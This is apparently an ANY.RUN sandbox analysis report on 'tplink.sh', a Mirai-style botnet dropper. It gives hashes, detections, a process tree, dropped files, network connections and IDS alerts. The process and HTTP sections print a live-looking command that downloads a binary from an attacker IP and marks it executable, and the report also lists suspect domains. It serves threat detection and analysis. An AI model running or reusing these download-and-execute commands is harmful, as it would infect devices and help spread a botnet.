File name:

tplink.sh

Full analysis: https://app.any.run/tasks/b5f8ee4f-12e4-40d4-b9f4-5a5d8711f0cc
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Malware Trends Tracker     >>>
Analysis date: June 18, 2025, 07:10:56
OS: Ubuntu 22.04.2
Tags:
auto
generic
mirai
botnet
MIME: text/plain
File info: ASCII text
MD5:

776392D802C5871D966E8C3FDEAD7E7C

SHA1:

1044336819BE1308F948FFCBC3A44769434F1174

SHA256:

D5E7BDC898DBF6B1EF5E2040E0A083F76C60D62832586A236768ABDB561E9DA8

SSDEEP:

12:H7+50RrkxiuX8VjckGosQC5cFRfD5cUXRGD5cebAJ5cNixg5cRow95cYtg5cqIe:b20+xacxV6F9D6kRGD6XJ6Nim696YtgL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • GENERIC has been found (auto)

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41424)
      • wget (PID: 41416)
      • wget (PID: 41438)

    • MIRAI has been found (auto)

      • wget (PID: 41431)

    • Application was dropped or rewritten from another process

      • k4bd (deleted) (PID: 41444)
      • k4bd (deleted) (PID: 41447)
      • k4bd (deleted) (PID: 41446)
      • k4bd (deleted) (PID: 41442)
      • xle1 (PID: 41441)
      • k4bd (deleted) (PID: 41445)

  • SUSPICIOUS

    • Starts itself from another location

      • xle1 (PID: 41441)

    • Executes commands using command-line interpreter

      • sudo (PID: 41400)
      • bash (PID: 41402)

    • Uses wget to download content

      • bash (PID: 41402)

    • Modifies file or directory owner

      • sudo (PID: 41397)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41402)

    • Connects to the server without a host name

      • wget (PID: 41404)
      • wget (PID: 41424)
      • wget (PID: 41416)
      • wget (PID: 41411)
      • wget (PID: 41448)
      • wget (PID: 41431)
      • wget (PID: 41438)

    • Potential Corporate Privacy Violation

      • wget (PID: 41416)
      • wget (PID: 41424)
      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41438)
      • wget (PID: 41431)

  • INFO

    • Checks timezone

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41431)
      • wget (PID: 41438)
      • wget (PID: 41424)
      • wget (PID: 41448)

    • Creates file in the temporary folder

      • wget (PID: 41404)
      • wget (PID: 41411)
      • wget (PID: 41416)
      • wget (PID: 41424)
      • wget (PID: 41431)
      • wget (PID: 41438)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
220
Monitored processes
89
Malicious processes
9
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs #GENERIC wget chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs bash no specs rm no specs #GENERIC wget systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs #GENERIC wget systemctl no specs systemctl no specs chmod no specs bash no specs rm no specs #MIRAI wget chmod no specs bash no specs rm no specs #GENERIC wget chmod no specs xle1 no specs k4bd (deleted) no specs rm no specs wget k4bd (deleted) no specs gnome-session-ctl no specs chmod no specs bash no specs k4bd (deleted) no specs k4bd (deleted) no specs rm no specs k4bd (deleted) no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs systemd no specs gsd-print-notifications no specs gnome-session-ctl no specs gnome-session-ctl no specs k4bd (deleted) no specs k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted) k4bd (deleted) k4bd (deleted) no specs k4bd (deleted)

Process information

PID
CMD
Path
Indicators
Parent process
41396/bin/sh -c "sudo chown user /home/user/Desktop/tplink\.sh && chmod +x /home/user/Desktop/tplink\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/tplink\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41397sudo chown user /home/user/Desktop/tplink.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41398chown user /home/user/Desktop/tplink.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41399chmod +x /home/user/Desktop/tplink.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41400sudo -iu user /home/user/Desktop/tplink.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41402-bash --login -c \/home\/user\/Desktop\/tplink\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41403/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41404wget http://31.57.63.48/j/mle1/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41407chmod 777 mle1/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41408-bash --login -c \/home\/user\/Desktop\/tplink\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
4
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
41404wget/tmp/mle1o
MD5:
SHA256:
41411wget/tmp/mbe1o
MD5:
SHA256:
41416wget/tmp/aale1binary
MD5:
SHA256:
41424wget/tmp/a5le1 (deleted)o
MD5:
SHA256:
41431wget/tmp/a7le1 (deleted)binary
MD5:
SHA256:
41438wget/tmp/xle1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
25
TCP/UDP connections
17
DNS requests
17
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
169.150.255.183:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
200
169.150.255.183:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
GET
204
185.125.190.96:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
200
195.181.175.40:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
41404
wget
GET
200
31.57.63.48:80
http://31.57.63.48/j/mle1
unknown
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
GET
200
37.19.194.80:443
https://odrs.gnome.org/1.0/reviews/api/ratings
unknown
binary
1.49 Mb
whitelisted
POST
200
185.125.188.58:443
https://api.snapcraft.io/v2/snaps/refresh
unknown
binary
45.5 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.49:80
Canonical Group Limited
GB
unknown
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.96:80
Canonical Group Limited
GB
unknown
37.19.194.81:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
195.181.175.41:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
41404
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41411
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
41416
wget
31.57.63.48:80
Aria Shatel Company Ltd
IR
unknown
512
snapd
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted

DNS requests

Domain
IP
Reputation
odrs.gnome.org
  • 37.19.194.81
  • 212.102.56.179
  • 195.181.175.41
  • 169.150.255.180
  • 207.211.211.27
  • 195.181.170.18
  • 169.150.255.184
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::19
whitelisted
google.com
  • 172.217.16.206
  • 2a00:1450:4001:830::200e
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
whitelisted
10.100.168.192.in-addr.arpa
unknown
3gipcam.com
unknown
connectivity-check.ubuntu.com
  • 2620:2d:4002:1::198
  • 2001:67c:1562::24
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::23
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::98
whitelisted
furry-femboys.top
unknown
twinkfinder.nl
unknown
cross-compiling.org
unknown
i-kiss-boys.com
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
tplink.sh